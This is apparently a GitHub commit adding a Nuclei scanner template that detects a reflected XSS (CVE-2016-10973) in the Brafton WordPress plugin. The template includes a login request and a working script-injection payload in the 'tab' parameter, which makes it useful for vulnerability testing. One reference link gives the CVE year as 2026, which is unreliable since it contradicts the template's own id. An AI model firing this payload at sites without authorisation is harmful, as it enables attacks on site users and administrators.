Create CVE-2016-10973.yaml

patch-1
Harsh Yadav 2023-06-25 17:13:30 +05:30 committed by GitHub
parent 83b298a080
commit c8861f63bd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2016-10973
info:
name: brafton WordPress Plugin <=3.4.7 - Reflected XSS
author: Harsh
severity: medium
description: |
The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
reference:
- https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd
- https://nvd.nist.gov/vuln/detail/CVE-2026-10973
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-10973
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2016,xss,brafton,reflected,auth
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83)) HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))")'
- 'contains(body_2, "Brafton Article Loader")'
condition: and